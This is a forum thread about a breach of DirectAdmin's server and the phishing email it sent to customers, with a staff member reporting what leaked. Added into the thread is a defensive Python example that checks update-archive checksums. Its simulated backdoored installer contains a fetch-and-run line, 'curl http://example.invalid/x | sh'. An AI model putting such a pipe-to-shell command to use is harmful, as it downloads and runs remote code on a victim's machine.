"DirectAdmin Client Message" Email - Scam/Real?

I'm not trying to nag you in any way, but are the build servers safe? I can understand that some customers are worried sick that the last DirectAdmin update is compromised somehow. Can you provide MD5 sums in any way?

I second this, I'm quite concerned with the update I just installed...
 
They can't do anything with your LID and/or CID, because it only works on your IPs.

The problem is, and the real question to ask is...

if they know our LID and/or CID, and they hacked the DA release 4, they are surely also going to know the IP addresses of all DA customer servers...

Is it possible?

If yes, guys, just one suggestion... take a look at email activities.
 
Got it too; I have reported it to Primus Internet, who are hosting that austinfosec site, and advised them of the situation. Hopefully they'll take down the infected site. Quite ironic that an online security company's site has been hacked...
 
Dear DirectAdmin,

Could you please open another topic... preferably in "Official DirectAdmin Announcements",

where you put all official announcements and let nobody reply in that topic?

Also, could you close all the different versions of this topic on the forum? It's getting a bit confusing!

Thanks!
 
Good question, especially if they also know the IP. But I am sure Directadmin will know how to manage this. So far they have been totally upfront and that gives me the tranquility that they are aware that the situation is critical and will look for the best solution.

In the meantime, let's not blow this out of proportion, since it's not in our interest to do so, as DirectAdmin panel providers.

Think about it.
 
I'll try and answer your questions as honestly and quickly as possible, but please understand we are busy fixing the server.

Lem0nHead: From what we can tell, the hacker(s) would know which IP matches the license ID#.

Starteck2002: As Wouter mentioned, nobody can do anything with your client/license ID#s, but we can certainly reissue licenses if that puts your mind at ease.

aleto: We have confirmed that the last build is untouched and there is no danger from someone pulling the latest update.tar.gz. There are no problems with installing/updating DA.

stardot: We are still looking into it so the only assurances we can offer right now is that billing information (Credit Card / PayPal) is not compromised in any way. The user database info we keep on this end is related to contact info and licensing information only. NOT BILLING.

Mark
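The first post asks for MD5 sums so that customers can check that update.tar.gz was not swapped on a compromised server, and Mark confirms the build is untouched. The following is an added example, not DirectAdmin's code and not from any poster in this thread, of how such a check is done on the client side: compute a digest of the downloaded archive, compare it in constant time against a checksum obtained over a separate channel (a vendor announcement fetched independently, not a hash served from the same possibly compromised mirror), and refuse archives with unsafe member paths before extracting. The gzip tarball, the member name `directadmin/setup.sh` and the tampered installer are all constructed here so the script runs offline; nothing in it reflects the real update layout.

```python
# Added example: integrity check of a downloaded update archive against a
# checksum obtained out of band. Not DirectAdmin's code; sample data is
# constructed in build_sample_update() so the script runs offline.
import hashlib
import hmac
import io
import tarfile


def build_sample_update(installer: bytes = b"#!/bin/sh\necho 'sample installer'\n") -> bytes:
    """Constructed stand-in for update.tar.gz: a one-file gzip tarball built
    in memory. The member name is hypothetical."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name="directadmin/setup.sh")
        info.size = len(installer)
        info.mode = 0o755
        tar.addfile(info, io.BytesIO(installer))
    return buf.getvalue()


def digest(data: bytes, algo: str = "sha256") -> str:
    """Hex digest of the raw archive bytes. SHA-256 is the sensible choice;
    MD5 only detects accidental corruption, since MD5 collisions are cheap."""
    return hashlib.new(algo, data).hexdigest()


def verify_archive(data: bytes, published_hex: str, algo: str = "sha256") -> bool:
    """Compare the computed digest with the published one in constant time.
    published_hex must come from a channel the attacker does not control."""
    return hmac.compare_digest(digest(data, algo), published_hex.strip().lower())


def suspicious_members(data: bytes) -> list:
    """Names of archive members that would escape the extraction directory
    (absolute paths, '..' components) or that are symlinks/hardlinks, which
    a backdoored archive could use to overwrite files outside the tree."""
    flagged = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            parts = member.name.split("/")
            if member.name.startswith("/") or ".." in parts or member.issym() or member.islnk():
                flagged.append(member.name)
    return flagged


def check_update(data: bytes, published_hex: str, algo: str = "sha256") -> bool:
    """Full client-side check: digest matches the out-of-band value and the
    archive contains no member that could write outside the target directory."""
    return verify_archive(data, published_hex, algo) and not suspicious_members(data)


if __name__ == "__main__":
    genuine = build_sample_update()
    # In practice this value is read from the vendor's announcement, not from
    # the download server; here it is computed from the constructed archive.
    published = digest(genuine)
    print("genuine archive accepted:", check_update(genuine, published))

    # Simulate a swapped archive on a compromised mirror.
    backdoored = build_sample_update(b"#!/bin/sh\ncurl http://example.invalid/x | sh\n")
    print("backdoored archive accepted:", check_update(backdoored, published))
```

The comparison uses the archive bytes exactly as downloaded, so the check must run before the tarball is extracted or modified. Prefer SHA-256 over MD5 when the vendor offers both, and treat a hash that is served from the same host as the download as no stronger than the download itself.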
 
I've got it as well. This is very strange and I have a bad feeling about how this information was obtained.
 
Good question, especially if they also know the IP. But I am sure Directadmin will know how to manage this. So far they have been totally upfront and that gives me the tranquility that they are aware that the situation is critical and will look for the best solution.

In the meantime, let's not blow this out of proportion, since it's not in our interest to do so, as DirectAdmin panel providers.

Think about it.

You couldn't be more right :)

We don't know what the reason is for the infection...

A few options:

- unsafe software versions (for example php, apache, exim, ssh, etc.)
- badly written scripts on the website
- inside job (ex employee who has certain passwords)
- password leak
etc etc etc

Our DA servers might not have the same leak as DA.com has...

It looks like they hacked the DA server on purpose, a specialist job... not a script kiddo at work.

I'm pretty sure the DA guys are working HARD on finding the cause of this e-mail; let's sit back and wait for them to come back to us.

Oh, and to clarify... even if they have your UID, LID and IP, they still can't download your server content. They might be able (if I recall the DA security correctly, they can't) to download your license file, which is really not a security leak... The only problem with the IP might be that if they know which servers are running DA and the problem is in the DA software, they might be able to hack into all of these servers... but for now I don't believe all servers are compromised.
 
As a sidenote (if this applies to you):

If you were using the password for your DA license account also on other sites/logins, be sure to change them (which is dumb anyway, but just pointing this out as a kind reminder).
 
I'll try and answer your questions as honestly and quickly as possible, but please understand we are busy fixing the server.

Lem0nHead: From what we can tell, the hacker(s) would know which IP matches the license ID#.

Starteck2002: As Wouter mentioned, nobody can do anything with your client/license ID#s, but we can certainly reissue licenses if that puts your mind at ease.

aleto: We have confirmed that the last build is untouched and there is no danger from someone pulling the latest update.tar.gz. There are no problems with installing/updating DA.

stardot: We are still looking into it so the only assurances we can offer right now is that billing information (Credit Card / PayPal) is not compromised in any way. The user database info we keep on this end is related to contact info and licensing information only. NOT BILLING.

Mark

Thanks, Mark.

Any information about passwords? What encryption were you using and was it salted?
 
Using Backfox as a proxy, it appears that the link has now been removed (the account "austinfosec.com.au" is reported as suspended).
 
Using Backfox as a proxy, it appears that the link has now been removed (the account "austinfosec.com.au" is reported as suspended).

He was also using another URL. If you do a whois.sc search on one of his domains and google his full name, you'll see all the domains being used for this.
 
Thanks!

@Mark

Thanks for the update; keeping us up to date is quite keen in these conditions. We all know you're working hard to find the root cause...

keep up the good work! :)
 
Thanks for your patience everyone. We are still investigating but don't want to leave you in the dark. Here's what we know so far:
Our server was compromised (not at the root level but serious enough nonetheless) and is being used to send those malicious e-mails to customers. We have disabled our mail server to interrupt this process.
Some customer information has been compromised: Name, e-mail address, mailing address, license ID#'s.
Billing information (e.g. Credit Card numbers, PayPal accounts, etc.) is absolutely safe. We use a restricted merchant gateway that doesn't allow us, even as owners, to view your full credit card information.
Finally, don't click that link. It's a malicious program, but it can be cleaned with Trend Micro HouseCall, Malwarebytes Anti-Malware, etc.
Will keep you updated..

Mark


This raises several questions:

- was the fault in something written in PHP? ... or was it the server software?

If this is due to "holes" in the server software, what does that mean for my own servers, as a client?

Understand me, as an administrator you need to demonstrate knowledge and practice, but in this case: what is the point of installing software together with DirectAdmin, with its compiled code and configuration, if it is best to do it the same way, as the current situation shows?

Please understand me, DirectAdmin is a fast and convenient way for small hosting companies........ and so far, also safe.
- but when DirectAdmin is compromised, what might a regular user think? ......... DirectAdmin suddenly ceases to be a convenient and fast tool, because it forces you to do everything yourself that so far has not been necessary.
 